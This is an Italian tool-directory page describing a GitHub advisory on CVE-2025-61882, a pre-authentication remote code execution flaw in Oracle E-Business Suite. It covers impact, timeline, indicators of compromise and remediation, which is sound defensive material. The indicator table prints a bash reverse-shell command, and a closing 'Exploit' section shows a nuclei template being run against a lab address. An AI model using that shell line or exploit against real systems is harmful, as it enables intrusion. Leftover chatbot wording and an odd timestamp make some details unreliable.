Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Blackash-CVE-2025-61882 — Fornisce un advisory dettagliato su CVE-2025-61882 con analisi tecnica, IOC, query di rilevamento e un template di exploit basato su nuclei per la RCE pre-autenticazione in Oracle E-Business Suite. | Kitploit
Strumenti/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingThreat IntelligenceRisposta agli Incidenti
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

Fornisce un advisory dettagliato su CVE-2025-61882 con analisi tecnica, IOC, query di rilevamento e un template di exploit basato su nuclei per la RCE pre-autenticazione in Oracle E-Business Suite.

Vedi Repository
2150 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🛡️🚨 CVE‑2025‑61882 — Esecuzione Remota di Codice Critica Pre‑Autenticazione in Oracle E‑Business Suite (EBS) 🚨🛡️

Riepilogo breve: Esecuzione remota di codice critica pre‑autenticazione in Oracle E‑Business Suite (EBS) — interessa le versioni 12.2.3 → 12.2.14, CVSS 9.8, sfruttata attivamente in natura (segnalate attività di ransomware/estorsione). ([oracle.com][1])


📌 Fatti rapidi (tabella)

CampoDettagli
🆔 CVECVE‑2025‑61882
🧾 Prodotto / ComponenteOracle E‑Business Suite (EBS) — integrazione Concurrent Processing / BI Publisher
📦 Versioni interessate12.2.3 → 12.2.14
🔢 CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ TipoEsecuzione remota di codice (RCE) — nessuna autenticazione richiesta
🔥 Sfruttata in naturaSì — segnalate campagne di sfruttamento di massa / estorsione
📅 Divulgazione / cronologiaOttobre 2025 (avviso del fornitore + writeup pubblici). ([oracle.com][1])

(Quanto sopra consolidato da avviso del fornitore, NVD/CISA e molteplici analisi dei fornitori.) ([oracle.com][1])


💥 Impatto (tabella)

Area di impattoCosa significa
🔓 RiservatezzaGli attaccanti possono leggere dati sensibili HR/finanziari/ERP
🛠️ IntegritàGli attaccanti possono modificare record, creare backdoor o alterare configurazioni
⚡ DisponibilitàGli attaccanti possono interrompere i servizi, eseguire ransomware o distruggere i backup
🧭 Livello di rischioEstremo — RCE pre‑autenticazione su sistema ERP critico → possibile pivot completo sul dominio

Riferimenti che segnalano sfruttamento ad alto impatto e collegamenti a ransomware. ([Rapid7][2])


🛠️ Riepilogo tecnico (conciso)

  • Vettore: Le richieste HTTP/HTTPS verso endpoint web EBS esposti attivano una catena di vulnerabilità nell'integrazione Concurrent Processing / BI Publisher che porta all'esecuzione remota di codice. ([oracle.com][1])
  • Complessità: Bassa (nessuna autenticazione, nessuna interazione con l'utente). ([nvd.nist.gov][3])
  • Payload osservati: pattern di reverse shell, web shell, script rilasciati utilizzati per l'esfiltrazione di dati ed estorsione. ([Rapid7][2])

🕵️‍♀️ Indicatori di Compromissione (IOC) — esempi (tabella)

Oracle e i team di incident response hanno pubblicato gli IOC; di seguito sono riportati esempi rappresentativi segnalati negli avvisi e nei writeup dei fornitori. Cercate questi pattern nei log e negli endpoint. ([oracle.com][1])

TipoEsempio
🌐 IP (osservati)200.107.207.26, 185.181.60.11 (indirizzi di esempio segnalati)
🧾 Pattern di comandosh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (reverse shell)
🗂️ Hash di fileDiversi hash SHA‑256 per script di exploit sospetti (vedere l'avviso del fornitore per l'elenco completo)
🕳️ ArtefattiWeb shell inattese, nuovi cronjob, connessioni in uscita sospette verso IP/porte insoliti

Se desiderate l'elenco completo degli IOC (IP, hash completi, nomi file) posso incollarlo qui — dite "incolla IOC". (Nessun link.)


🧭 Cronologia (compatta)

DataEvento
9 agosto 2025Prima attività di sfruttamento nel mondo reale segnalata (telemetria del fornitore). ([crowdstrike.com][4])
Inizio ottobre 2025Oracle ha emesso un avviso di sicurezza / disponibilità di patch per EBS. ([oracle.com][1])
6–7 ottobre 2025CISA ha aggiunto la CVE al suo catalogo Known Exploited Vulnerabilities (KEV) (indicazioni per le agenzie federali, scadenza per la mitigazione). ([cisa.gov][5])
Ottobre 2025 (in corso)Molteplici writeup di fornitori e segnalazioni di sfruttamento di massa (CrowdStrike, Rapid7, Tenable, ecc.). ([crowdstrike.com][4])

✅ Azioni immediate raccomandate (tabella dei passaggi)

PrioritàAzioneNote / Specifiche di esempio
1️⃣ CriticaApplicare la patch alle istanze EBS interessateApplicare immediatamente le patch dell'avviso di sicurezza Oracle per le versioni 12.2.3–12.2.14. ([oracle.com][1])
2️⃣ AltaIsolare / limitare l'accesso agli endpoint web EBSBloccare HTTP/HTTPS esposti a Internet verso EBS; consentire solo IP amministrativi fidati o VPN.
3️⃣ AltaAbilitare/regolare le regole WAFDistribuire firme WAF di fornitori/comunità per i pattern di exploit; bloccare payload sospetti. ([Rapid7][2])
4️⃣ AltaCaccia e rilevamentoCercare nei log comandi di reverse shell, scritture di file anomale e connessioni in uscita verso gli IOC.
5️⃣ IncidenteContenere e rispondere se si riscontra una compromissioneIsolare l'host, preservare le prove forensi, cambiare le credenziali, ricostruire da backup puliti.
6️⃣ PolicySegnalare e notificareSe rientrate in requisiti normativi/contrattuali, notificare stakeholder e autorità secondo la policy (le indicazioni CISA/KEV possono applicarsi). ([nvd.nist.gov][3])

💀 Exploit :

┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io
Scarica lo strumento